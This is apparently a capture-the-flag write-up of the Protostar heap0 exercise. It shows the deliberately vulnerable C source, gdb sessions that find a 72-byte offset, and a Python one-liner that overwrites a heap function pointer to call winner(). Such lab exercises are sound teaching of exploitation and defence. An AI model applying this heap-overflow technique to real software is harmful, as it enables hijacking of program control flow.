Protostar Heap0 – Writeup

Now Heap Overflow Level 0. I think it similar with stack base overflow.

Description

This level introduces heap overflows and how they can influence code flow.

This level is at /opt/protostar/bin/heap0

Heap0.c

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <stdio.h>
#include <sys/types.h>

struct data {
  char name[64];
};

struct fp {
  int (*fp)();
};

void winner()
{
  printf("level passed\n");
}

void nowinner()
{
  printf("level has not been passed\n");
}

int main(int argc, char **argv)
{
  struct data *d;
  struct fp *f;

  d = malloc(sizeof(struct data));
  f = malloc(sizeof(struct fp));
  f->fp = nowinner;

  printf("data is at %p, fp is at %p\n", d, f);

  strcpy(d->name, argv[1]);
  
  f->fp();

}

Let’s check the process.

[email protected]:/opt/protostar/bin$ ./heap0 AAAAAAAAAAAAAAAAAA
data is at 0x804a008, fp is at 0x804a050
level has not been passed

Now open pattern and exploit to get the offset of buffer size.

[email protected]:/opt/protostar/bin$ gdb ./heap0
GNU gdb (GDB) 7.0.1-debian
Copyright (C) 2009 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law.  Type "show copying"
and "show warranty" for details.
This GDB was configured as "i486-linux-gnu".
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>...
Reading symbols from /opt/protostar/bin/heap0...done.
(gdb) run
Starting program: /opt/protostar/bin/heap0 
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
*__GI_strcpy (dest=0x804a008 "", src=0x0) at strcpy.c:39
39	strcpy.c: No such file or directory.
	in strcpy.c
(gdb) run Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
The program being debugged has been started already.
Start it from the beginning? (y or n) y

Starting program: /opt/protostar/bin/heap0 Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2A
data is at 0x804a008, fp is at 0x804a050

Program received signal SIGSEGV, Segmentation fault.
0x41346341 in ?? ()

Now. offset is 72.

┌─[[email protected]]─[~/Downloads/pattern-master]
└──> ./pattern offset 0x41346341
72

we need to call the right function winner. I use print winnner in gdb.

(gdb) print winner
$1 = {void (void)} 0x8048464 <winner>

Final exploit!

[email protected]:/opt/protostar/bin$ ./heap0 $(python -c 'print "A"*72+"\x64\x84\x04\x08"')
data is at 0x804a008, fp is at 0x804a050
level passed

Bagno! Level passed. Thanks for reading. Happy Hacking.